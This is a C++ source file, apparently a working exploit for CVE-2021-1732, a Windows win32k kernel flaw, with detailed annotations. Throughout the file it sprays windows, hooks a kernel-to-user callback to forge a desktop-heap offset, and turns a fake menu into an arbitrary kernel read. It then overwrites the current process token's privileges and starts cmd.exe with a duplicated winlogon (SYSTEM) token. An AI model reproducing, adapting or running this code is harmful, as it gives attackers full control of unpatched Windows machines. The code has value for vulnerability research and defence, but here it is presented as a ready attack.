// CVE-2021-1732.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>
#include <HookLib.h>
#include "util.h"
#pragma comment(lib, "Zydis.lib")
#pragma comment(lib, "HookLib.lib")
// Class and window names for every window this program creates.
#define CLS_NAME L"PO_WND_CLS"
#define WND_NAME L"PO_WND"
// Number of windows sprayed in main(); the one at SPRAY_WND_COUNT / 2 is
// destroyed so that the target window reuses its slot.
#define SPRAY_WND_COUNT 0x200
// Index of the PEB callback-table entry hooked in main() (the table pointer
// is read from PEB+0x58 there).
#define CALLBACK_INDEX 0x7B
// Raw structure offsets. Each is hard-coded for one Windows build, used
// without any validation, and (see the ulTagWndBodySize comment in main())
// known to differ between builds; treat all of them as build-specific
// assumptions rather than constants.
#define TEB_DESKTOPHEAP_OFF 0x828
#define ETHREAD_WIN32THREAD_OFF 0x1c8
#define WIN32THREAD_DESKTOP_OFF 0x1c0
#define DESKTOP_HEAPBASE_OFF 0x80
#define TAGWND_BODY_SIZE 0x150
#define TAGWND_BODY_EXTRA_SIZE_OFF 0xc8
#define TAGWND_BODY_STYLE_OFF 0x1c
#define TAGWND_BODY_REL_FLAG_OFF 0xE8
#define TAGWND_BODY_REL_VALUE_OFF 0x128
#define TOKEN_PRIVILEGE_OFF 0x40 // unused in this file: main() writes 0x40 and 0x48 as literals
// Packs two 32-bit halves into one 64-bit value (h in the high dword).
// NOTE(review): the expansion has no outer parentheses, so the trailing `|`
// is exposed to the caller's expression; this is safe in ReBuildData()'s
// plain assignments but would misbehave inside a larger expression.
#define MAKE_64BIT_VALUE( h, l ) \
( ((ULONG64)(h) << 32) ) | ( (ULONG64)(l) )
// Debug-only breakpoints; compiled out unless the `#if 0` is flipped.
// The enabled form carries its own trailing ';'.
#if 0
#define DEBUG_BREAK() __debugbreak();
#else
#define DEBUG_BREAK()
#endif
// Handles of the sprayed windows (filled in by main()).
HWND SprayWndHandles[SPRAY_WND_COUNT];
// Signature of the hooked PEB callback. UserModeCallback_Orig receives the
// original entry from SetHook() but is never invoked (see UserModeCallback_Proxy).
using USERMODECALLBACK = VOID(WINAPI*)( ULONG_PTR Para1, ULONG_PTR Para2, ULONG_PTR Para3, ULONG_PTR Para4 );
USERMODECALLBACK UserModeCallback_Orig = NULL;
// win32u!NtUserConsoleControl, resolved with GetProcAddress() in main().
using NTUSERCONSOLECONTROL = NTSTATUS(WINAPI*)(ULONG_PTR CtrlCode, PVOID CtrlInfo, ULONG_PTR CtrlInfoLen);
NTUSERCONSOLECONTROL NtUserConsoleControl = NULL;
// ntdll!NtCallbackReturn, resolved in main(); the proxy uses it to hand the
// kernel its "allocation" result instead of returning normally.
using NTCALLBACKRETURN = NTSTATUS (WINAPI*)( IN PVOID OutputBuffer, IN ULONG OutputLength, IN NTSTATUS Status );
NTCALLBACKRETURN NtCallbackReturn = NULL;
// user32!HMValidateHandle (not exported), resolved by FindHMValidateHandle().
using HMVALIDATEHANDLE = VOID* (WINAPI*)(HWND hwnd, int type);
HMVALIDATEHANDLE HMValidateHandle = NULL;
// Resolves the unexported user32!HMValidateHandle and stores it in the
// HMValidateHandle global. It is located indirectly: the exported IsMenu() is
// scanned for its first 0xE8 (call rel32) byte and the call's relative target
// is followed. Returns FALSE (after printing a message) if user32 cannot be
// loaded, IsMenu is not exported, or no 0xE8 byte is found within the first
// 0x1000 bytes of IsMenu.
// NOTE(review): the scan matches the first 0xE8 *byte*, not the first call
// instruction, so an operand byte of 0xE8 would be followed instead; nothing
// verifies that the resolved address really is HMValidateHandle before
// GetWndObjOffset() calls through it.
BOOL FindHMValidateHandle() {
    HMODULE hUser32 = LoadLibraryA("user32.dll");
    if (hUser32 == NULL) {
        printf("Failed to load user32");
        return FALSE;
    }
    BYTE* pIsMenu = (BYTE*)GetProcAddress(hUser32, "IsMenu");
    if (pIsMenu == NULL) {
        printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
        return FALSE;
    }
    // Offset (from pIsMenu) of the rel32 operand that follows the 0xE8 opcode.
    unsigned int uiHMValidateHandleOffset = 0;
    for (unsigned int i = 0; i < 0x1000; i++) {
        BYTE* test = pIsMenu + i;
        if (*test == 0xE8) {
            uiHMValidateHandleOffset = i + 1;
            break;
        }
    }
    if (uiHMValidateHandleOffset == 0) {
        printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
        return FALSE;
    }
    // Unaligned read of the 32-bit relative displacement.
    unsigned int addr = *(unsigned int*)(pIsMenu + uiHMValidateHandleOffset);
    // Both pointers are truncated to 32 bits; the result is still the right
    // RVA only because IsMenu and the call target both lie inside user32's
    // image, so the arithmetic modulo 2^32 cancels the truncation.
    unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
    // NOTE(review): the constant 11 bakes in where the call sits inside IsMenu;
    // it is not derived from uiHMValidateHandleOffset, so this only resolves
    // correctly on a user32 layout where the two agree — confirm on the build in use.
    HMValidateHandle = (HMVALIDATEHANDLE)((ULONG_PTR)hUser32 + offset + 11);
    return TRUE;
}
// Computes the offset of hwnd's window object from the base of the desktop
// heap using only user-mode reads: HMValidateHandle() returns the user-mode
// view of the object and TEB+TEB_DESKTOPHEAP_OFF holds the base of that view,
// so their difference is the heap-relative offset (which the rest of this file
// treats as also valid on the kernel side — see UserModeCallback_Proxy).
// Requires FindHMValidateHandle() to have succeeded; the global is called
// unconditionally.
// NOTE(review): the return type is ULONG, so the 64-bit difference is
// truncated; callers store the result in a ULONG_PTR as if it were full width.
ULONG GetWndObjOffset(ULONG_PTR hwnd ) {
    PVOID pCurWndObj = NULL;
    ULONG_PTR ulWndObjOff = 0x0;
    ULONG_PTR ulTebAddr = 0;
    ulTebAddr = __readgsqword(0x30); // GS:[0x30] is the TEB self-pointer on x64
    pCurWndObj = HMValidateHandle((HWND)hwnd, 0x1); // handle type 1 = window
    ulWndObjOff = (ULONG_PTR)pCurWndObj - *(ULONG_PTR*)(ulTebAddr + TEB_DESKTOPHEAP_OFF);
    return ulWndObjOff;
}
// Replacement for the hooked PEB callback-table entry (CALLBACK_INDEX). The
// kernel calls this entry to have the window's class-extra bytes allocated in
// user mode (the comment at the bottom names the original handler). Instead
// of allocating, the proxy:
//   1. derives the handle of the window now occupying the slot that
//      DestroyWindow() freed in main() — same low word, generation word +1;
//   2. calls NtUserConsoleControl(0x6) on that handle, which (per the
//      original "change flag" comment) alters how the kernel interprets the
//      value returned next; the exact kernel-side semantics are not visible
//      in this file, but everything after step 1 in main() relies on the
//      returned value being treated as a desktop-heap-relative offset;
//   3. hands the window object's own heap offset back through
//      NtCallbackReturn(), so the "extra bytes" block aliases the window object.
// Para1..Para4 are only printed. Control does not return from
// NtCallbackReturn(), which is why the original callback is not chained.
// NOTE(review): the generation fix-up assumes the slot was reused exactly
// once, and ulCurWnd is a truncated 32-bit copy of the 64-bit HWND.
VOID WINAPI UserModeCallback_Proxy(ULONG_PTR Para1, ULONG_PTR Para2, ULONG_PTR Para3, ULONG_PTR Para4)
{
    ULONG_PTR ulConsoleInfo[0x2] = { 0 };
    ULONG_PTR ulRetBuffer[0x3] = { 0 };
    ULONG ulCurWnd = (ULONG)SprayWndHandles[SPRAY_WND_COUNT / 2];
    ULONG_PTR ulWndObjOff = 0x0;
    printf("UserMode Callback: %llx %llx %llx %llx\n", Para1, Para2, Para3, Para4 );
    printf( "Current window is Handle %X\n", ulCurWnd);
    // The slot was freed and occupied again, so the handle's generation (high
    // word) has been incremented once; see the author's blog article for details.
    {
        USHORT usHigh = (ulCurWnd >> 0x10) & 0xffff;
        USHORT usLow = ulCurWnd & 0xffff;
        ulCurWnd = ((usHigh + 1) << 0x10) | usLow;
    }
    DEBUG_BREAK();
    ulWndObjOff = GetWndObjOffset(ulCurWnd);
    printf("Current Window Object relative to DesktopHeap's offset:%X\n", ulWndObjOff);
    // Trigger the flag change on the reused window (control code 0x6).
    ulConsoleInfo[0] = ulCurWnd;
    NtUserConsoleControl(0x6, (PVOID)&ulConsoleInfo, sizeof(ulConsoleInfo));
    // Return the object's own heap offset as the "allocation" result.
    ulRetBuffer[0] = ulWndObjOff;
    NtCallbackReturn(&ulRetBuffer, sizeof(ulRetBuffer), 0x0);
    // A hook would normally chain to the original here; it is not needed in
    // this case because USER32!_xxxClientAllocWindowClassExtraBytes itself
    // ends in NtCallbackReturn, which has already been issued above.
    //UserModeCallback_Orig(Para1, Para2, Para3, Para4);
}
// Registers a window class named ClsName whose windows carry 0x100 bytes of
// per-window extra storage (cbWndExtra); a non-zero cbWndExtra is what causes
// the user-mode extra-bytes callback to be invoked when a window is created.
// Returns TRUE when RegisterClass() succeeds, FALSE otherwise.
BOOL RegistWndClass( PCTSTR ClsName ) {
    WNDCLASS windowClass = { 0 };
    windowClass.lpfnWndProc = DefWindowProc;
    windowClass.hInstance = GetModuleHandle(NULL);
    windowClass.lpszClassName = ClsName;
    windowClass.cbWndExtra = 0x100; // must specify, otherwise can't trigger xxxClientAllocWindowClassExtraBytes
    ATOM classAtom = RegisterClass(&windowClass);
    return classAtom != 0;
}
// Creates a zero-sized, unstyled window of class ClsName named WND_NAME in
// the current module. Returns the new HWND, or NULL if creation fails.
HWND CreateWnd( PCTSTR ClsName ) {
    HINSTANCE hOwnerModule = GetModuleHandle(NULL);
    HWND hNewWnd = CreateWindowEx(NULL, ClsName, WND_NAME, NULL, 0, 0, 0, 0, NULL, NULL, hOwnerModule, NULL);
    return hNewWnd;
}
// Packs the rcBar rectangle of a MENUBARINFO back into two 64-bit words:
// *RetValue0 = (top << 32) | left and *RetValue1 = (height << 32) | width,
// where each component is first truncated to 32 bits. ReadPrimitive() uses
// *RetValue0 as the 8 bytes read through the fake menu.
VOID ReBuildData( PMENUBARINFO MenuBarInfoPtr, ULONG_PTR* RetValue0, ULONG_PTR* RetValue1 ) {
    const RECT& bar = MenuBarInfoPtr->rcBar;
    ULONG ulLeft = (ULONG)bar.left;
    ULONG ulTop = (ULONG)bar.top;
    ULONG ulWidth = (ULONG)bar.right - ulLeft;
    ULONG ulHeight = (ULONG)bar.bottom - ulTop;
    *RetValue0 = MAKE_64BIT_VALUE(ulTop, ulLeft);
    *RetValue1 = MAKE_64BIT_VALUE(ulHeight, ulWidth);
}
// Arbitrary-read primitive built on GetMenuBarInfo(). Once main() has pointed
// the target window's menu at pFakeMenu / pFakeItems, the "bar rectangle"
// returned for item 1 is taken from pFakeItems[0] + 0x40 (see the step-5
// comment in main()), and ReBuildData() re-packs top/left into the 8 bytes
// that were read. Only the first 8 bytes (ulValue0) are used; ulValue1 is
// computed and discarded.
// NOTE(review): the GetMenuBarInfo() return value is not checked and
// menuBarInfo is not zero-initialized, so a failed call returns stack garbage
// which the callers in main() then use as an address.
ULONG_PTR ReadPrimitive( HWND TargetWnd ) {
    MENUBARINFO menuBarInfo;
    ULONG_PTR ulValue0, ulValue1;
    menuBarInfo.cbSize = sizeof(menuBarInfo);
    GetMenuBarInfo(TargetWnd, OBJID_MENU, 0x1, &menuBarInfo);
    ReBuildData(&menuBarInfo, &ulValue0, &ulValue1);
    return ulValue0;
}
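// Returns the address that main() treats as the current thread's kernel
// thread object (resolved from a handle by GetTargetHandleObject() in util.h,
// not shown here), or 0 on failure. The handle is closed before returning.
ULONG_PTR GetCurThreadObjAddr() {
    ULONG_PTR ulAddr = 0x0;
    HANDLE hThread = OpenThread(THREAD_QUERY_INFORMATION, FALSE, GetCurrentThreadId());
    // OpenThread reports failure with NULL, not INVALID_HANDLE_VALUE; the
    // previous comparison against INVALID_HANDLE_VALUE never detected a failed
    // open and passed a NULL handle on to GetTargetHandleObject().
    if (hThread == NULL) {
        return 0;
    }
    ulAddr = (ULONG_PTR)GetTargetHandleObject(GetCurrentProcessId(), (ULONG_PTR)hThread);
    CloseHandle(hThread);
    return ulAddr;
}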
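// Returns the address that main() treats as the current process's primary
// token object (resolved from a handle by GetTargetHandleObject() in util.h,
// not shown here), or 0 if the process or token handle cannot be opened.
// Both handles are closed before returning; the earlier version leaked them
// and, when OpenProcessToken() failed, passed an uninitialized hToken on.
ULONG_PTR GetCurTokenObjAddr() {
    HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
    if (hProc == NULL) {
        return 0;
    }
    HANDLE hToken = NULL;
    BOOL bOpened = OpenProcessToken(
        hProc,
        TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY,
        &hToken);
    CloseHandle(hProc); // no longer needed once the token handle exists
    if (!bOpened) {
        return 0;
    }
    // Resolve while the handle is still open; the token object itself stays
    // alive as the process's primary token after the handle is closed.
    PVOID pTokenObj = GetTargetHandleObject(GetCurrentProcessId(), (ULONG_PTR)hToken);
    CloseHandle(hToken);
    return (ULONG_PTR)pTokenObj;
}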
// Looks up the PID of the first running process whose image name matches
// ImageName (case-insensitive, lstrcmpi). On success stores it in *ProcIDPtr
// and returns TRUE; returns FALSE if the snapshot cannot be taken or no
// process matches, leaving *ProcIDPtr untouched. The snapshot handle is
// closed on every path.
BOOL GetProIDByName(PCWCHAR ImageName, ULONG_PTR* ProcIDPtr)
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }
    BOOL bFound = FALSE;
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(entry);
    for (BOOL bMore = Process32First(hSnapshot, &entry); bMore; bMore = Process32Next(hSnapshot, &entry)) {
        if (lstrcmpi(ImageName, entry.szExeFile) == 0) {
            *ProcIDPtr = entry.th32ProcessID;
            bFound = TRUE;
            break;
        }
    }
    CloseHandle(hSnapshot);
    return bFound;
}
// Final step: duplicates the primary token of winlogon.exe and starts cmd.exe
// with it (the original "SYSTEM token" comment below). Runs after main() has
// rewritten fields of the current process's token in step 6; an unmodified
// low-privilege caller would presumably be refused at OpenProcess() or
// DuplicateTokenEx(). Returns silently (VOID) on every failure path.
// NOTE(review): the OpenProcess(), OpenProcessToken() and
// CreateProcessWithTokenW() results are unchecked, hToken is uninitialized if
// OpenProcessToken() fails, and hProc, hToken, hEopToken and the handles in
// pi are never closed.
VOID CreateEopProc() {
    HANDLE hProc;
    HANDLE hToken;
    HANDLE hEopToken;
    ULONG_PTR ulWinlogonPID = 0;
    if (!GetProIDByName(L"Winlogon.exe", &ulWinlogonPID) || !ulWinlogonPID)
        return;
    hProc = OpenProcess(
        PROCESS_QUERY_INFORMATION,
        FALSE,
        ulWinlogonPID );
    OpenProcessToken(
        hProc,
        TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY,
        &hToken);
    // Duplicate as a primary token at SecurityImpersonation with MAXIMUM_ALLOWED.
    SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = SecurityImpersonation;
    TOKEN_TYPE tokenType = TokenPrimary;
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, seImpersonateLevel, tokenType, &hEopToken))
        return;
    /* Starts a new process with SYSTEM token */
    STARTUPINFOW si = {};
    PROCESS_INFORMATION pi = {};
    CreateProcessWithTokenW(
        hEopToken,
        LOGON_NETCREDENTIALS_ONLY,
        L"C:\\Windows\\System32\\cmd.exe",
        NULL,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}
// Entry point. Sequence (numbered steps match the comments in the body):
//   - resolve win32u!NtUserConsoleControl, ntdll!NtCallbackReturn and
//     user32!HMValidateHandle; spray SPRAY_WND_COUNT windows, destroy the
//     middle one and hook PEB callback-table entry CALLBACK_INDEX so the next
//     window's extra-bytes allocation is answered by UserModeCallback_Proxy();
//   - create the target window in the freed slot; from then on positive
//     SetWindowLong/SetWindowLongPtr indexes on it address the window object
//     itself, because the proxy returned the object's own heap offset;
//   1-4. install a fake menu so GetMenuBarInfo() becomes a read primitive
//        (ReadPrimitive());
//   5.   read thread object -> Win32 thread -> desktop -> desktop-heap base;
//   6.   make the sprayed window adjacent to the target refer to the process
//        token and rewrite token fields through it;
//   7.   start a process with a duplicated winlogon token (CreateEopProc());
//   8.   undo the target window's modified fields before exiting.
// Returns -1 only if the thread object address cannot be resolved; otherwise
// blocks on getchar() and returns 0 implicitly.
// NOTE(review): the LoadLibrary()/GetProcAddress()/FindHMValidateHandle()/
// SetHook() results are never checked, so a missing export surfaces later as
// a call through NULL; several printf("%X") calls receive 64-bit HWND or
// ULONG_PTR values; the hook is never removed and the target window is never
// destroyed before the process exits.
int main()
{
    HMODULE hWin32uMod = LoadLibrary(TEXT("win32u.dll"));
    HMODULE hWinNtdllMod = LoadLibrary(TEXT("ntdll.dll"));
    ULONG_PTR ulPebAddr = __readgsqword(0x60); // GS:[0x60] is the PEB pointer on x64
    // PEB+0x58: the table of user-mode callbacks the kernel dispatches into.
    PULONG_PTR pUserModeCallbackTable = *(PULONG_PTR*)(ulPebAddr + 0x58);
    DEBUG_BREAK();
    NtUserConsoleControl = (NTUSERCONSOLECONTROL)GetProcAddress(hWin32uMod, "NtUserConsoleControl");
    NtCallbackReturn = (NTCALLBACKRETURN)GetProcAddress(hWinNtdllMod, "NtCallbackReturn");
    InitGlobalFunc(); // from util.h (not shown)
    FindHMValidateHandle(); // return value ignored
    if (RegistWndClass(CLS_NAME) ) {
        // Spray, then free the middle window so the next CreateWnd() reuses its slot.
        for (int i = 0; i < SPRAY_WND_COUNT; i++) {
            SprayWndHandles[i] = CreateWnd(CLS_NAME);
        }
        printf("SprayWndHandles[%x] == %X \n", SPRAY_WND_COUNT / 2, SprayWndHandles[SPRAY_WND_COUNT / 2]);
        DestroyWindow(SprayWndHandles[SPRAY_WND_COUNT/2]);
        // SetHook() is from HookLib; the original entry is saved in
        // UserModeCallback_Orig but never chained (see UserModeCallback_Proxy).
        SetHook((PVOID)(pUserModeCallbackTable[CALLBACK_INDEX]), UserModeCallback_Proxy, reinterpret_cast<PVOID*>(&UserModeCallback_Orig));
        // Creating this window is what invokes the hooked callback.
        HWND hTargetWnd = CreateWnd(CLS_NAME);
        printf("hTargetWnd == %X\n", hTargetWnd);
        DEBUG_BREAK();
        {
            ULONG_PTR ulDesktopHeapBase = 0x0;
            ULONG_PTR ulFakeHandle = 0xFFFF;
            ULONG_PTR ulFakeRefCount[2] = { 0 };
            PULONG_PTR pFakeMenu = NULL;
            PULONG_PTR pFakeMenuBody = NULL;
            PULONG_PTR pFakeItems = NULL;
            // 1. Adjust target wnd's style to WFCHILD(0x40), so that GWLP_ID below writes the spmenu field.
            //    (Index TAGWND_BODY_STYLE_OFF lands on the window object itself — see the header comment.)
            SetWindowLong(hTargetWnd, TAGWND_BODY_STYLE_OFF, 0x40c00000);
            // 2. Set fake menu into the window object header (+0xa8).
            //    The three pages below are handed to the kernel as menu, menu body and item array;
            //    the stack locals ulFakeHandle / ulFakeRefCount are referenced from them and must
            //    stay in scope until step 8.
            pFakeMenu = (PULONG_PTR)VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pFakeMenuBody = (PULONG_PTR)VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pFakeItems = (PULONG_PTR)VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            SetWindowLongPtr(hTargetWnd, GWLP_ID, (LONG_PTR)pFakeMenu);
            // 3. Restore target wnd's style
            SetWindowLong(hTargetWnd, TAGWND_BODY_STYLE_OFF, 0x04c00000);
            // 4. Build fake menu's bar info (field positions are build-specific assumptions).
            pFakeMenu[0] = (ULONG_PTR)&ulFakeHandle;
            pFakeMenu[5] = (ULONG_PTR)pFakeMenuBody; // fake body
            ((PULONG)(&pFakeMenuBody[5]))[1] = 0xffff; // make items count max so item index 1 is in range
            ((PULONG)(&pFakeMenu[8]))[0] = 1; // make menu's x 1
            ((PULONG)(&pFakeMenu[8]))[1] = 1; // make menu's y 1
            pFakeMenu[0xb] = (ULONG_PTR)pFakeItems; // set fake menu's fake items
            ulFakeRefCount[0] = (ULONG_PTR)pFakeMenu;
            pFakeMenu[0x13] = (ULONG_PTR)&ulFakeRefCount;
            // 5. Read target address's info. Each ReadPrimitive() returns the 8 bytes at
            //    pFakeItems[0] + 0x40, hence every address below is pre-adjusted by -0x40.
            {
                ULONG_PTR ulAddr = 0;
                ULONG_PTR ulValue = 0;
                ulAddr = GetCurThreadObjAddr();
                if (!ulAddr)
                    return -1;
                pFakeItems[0] = (ULONG_PTR)(ulAddr + ETHREAD_WIN32THREAD_OFF - 0x40); // target address you want to read(+0x40)
                ulValue = 0;
                ulValue = ReadPrimitive(hTargetWnd);
                pFakeItems[0] = (ULONG_PTR)(ulValue - 0x40);
                ulValue = 0;
                ulValue = ReadPrimitive(hTargetWnd);
                pFakeItems[0] = (ULONG_PTR)(ulValue + WIN32THREAD_DESKTOP_OFF - 0x40);
                ulValue = 0;
                ulValue = 0;
                ulValue = ReadPrimitive(hTargetWnd);
                pFakeItems[0] = (ULONG_PTR)(ulValue + DESKTOP_HEAPBASE_OFF - 0x40);
                ulValue = 0;
                ulValue = ReadPrimitive(hTargetWnd);
                ulDesktopHeapBase = ulValue;
            }
            DEBUG_BREAK();
            // 6. Modify current process's token
            {
                ULONG_PTR ulWndOffset = 0x0;
                ULONG_PTR ulValue = 0x0;
                ULONG_PTR ulTokenObjAddr = 0x0;
                HWND hAdjacentWnd = 0x0;
                ULONG ulTagWndBodySize = TAGWND_BODY_SIZE; // need to fix, may be 0x140, or 0x160
                BOOLEAN bAdjacent = FALSE;
                hAdjacentWnd = SprayWndHandles[SPRAY_WND_COUNT / 2 + 1];
                ulWndOffset = GetWndObjOffset((ULONG_PTR)hTargetWnd);
                // 6.1 Verify adjacency and fix the offset: probe up to 0x30 bytes past the
                //     assumed body size for the adjacent window's handle value. If it is
                //     not found, bAdjacent stays FALSE and step 6.2 is skipped silently.
                for (ULONG ulIndex = 0x0; ulIndex < 0x30; ulIndex += 8) {
                    pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + ulTagWndBodySize + ulIndex - 0x40);
                    ulValue = 0;
                    ulValue = ReadPrimitive(hTargetWnd);
                    if (ulValue == (ULONG_PTR)hAdjacentWnd) {
                        bAdjacent = TRUE;
                        ulTagWndBodySize += ulIndex;
                        break;
                    }
                }
                // 6.2 Rewrite the adjacent window object through hTargetWnd (indexes
                //     ulTagWndBodySize + ... reach into it), then use hAdjacentWnd as the write path.
                if (bAdjacent) {
                    // read adjacent hwnd's flag
                    pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF - 0x40);
                    ulValue = 0;
                    ulValue = ReadPrimitive(hTargetWnd);
                    ulTokenObjAddr = GetCurTokenObjAddr();
                    // Extra-size fields set to -1 on both windows; presumably this lifts the
                    // index bound on the writes below — the check itself is not visible here.
                    SetWindowLongPtr(hTargetWnd, TAGWND_BODY_EXTRA_SIZE_OFF, (ULONG_PTR)-1);
                    SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF, ulValue | 0x800);
                    // Relative value = token object's offset from the desktop-heap base.
                    SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_VALUE_OFF, ulTokenObjAddr - ulDesktopHeapBase);
                    SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_EXTRA_SIZE_OFF, (ULONG_PTR)-1);
                    // Writes through the adjacent window now land in the token object at
                    // these offsets (0x40/0x48 match TOKEN_PRIVILEGE_OFF at the top of the
                    // file; 0x498+0x30 and 0x498+0x40 are not documented in this file).
                    SetWindowLongPtr(hAdjacentWnd, 0x40, (ULONG_PTR)-1);
                    SetWindowLongPtr(hAdjacentWnd, 0x48, (ULONG_PTR)-1);
                    SetWindowLong(hAdjacentWnd, 0x498 + 0x30, 0x7);
                    SetWindowLong(hAdjacentWnd, 0x498 + 0x40, 0xf);
                    // Restore adjacent window: clear the 0x800 flag, zero the relative
                    // value and put the extra size back to the class's 0x100.
                    pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF - 0x40);
                    ulValue = 0;
                    ulValue = ReadPrimitive(hTargetWnd);
                    SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF, ulValue & ~0x800);
                    SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_VALUE_OFF, 0);
                    SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_EXTRA_SIZE_OFF, 0x100 ); // our specified size
                    SetWindowLongPtr(hTargetWnd, TAGWND_BODY_EXTRA_SIZE_OFF, 0x100); // our specified size
                }
            }
            // 7. Create Eop Process (runs even if step 6.2 was skipped)
            DEBUG_BREAK();
            CreateEopProc();
            // 8. Restore modified window objects
            {
                ULONG_PTR ulWndOffset = 0x0;
                ULONG_PTR ulValue = 0x0;
                ulWndOffset = GetWndObjOffset((ULONG_PTR)hTargetWnd);
                pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + TAGWND_BODY_REL_FLAG_OFF - 0x40);
                ulValue = 0;
                ulValue = ReadPrimitive(hTargetWnd);
                // 8.1 restore fake menu to NULL
                SetWindowLongPtr(hTargetWnd, GWLP_ID, 0x0);
                // 8.2 Restore target wnd's style
                SetWindowLong(hTargetWnd, TAGWND_BODY_STYLE_OFF, 0x04c00000);
                // 8.3 Restore target wnd's relative flag
                SetWindowLongPtr(hTargetWnd, TAGWND_BODY_REL_FLAG_OFF, ulValue & ~0x800);
                // 8.4 restore relative value to NULL
                SetWindowLongPtr(hTargetWnd, TAGWND_BODY_REL_VALUE_OFF, 0);
            }
            getchar();
        }
    }
}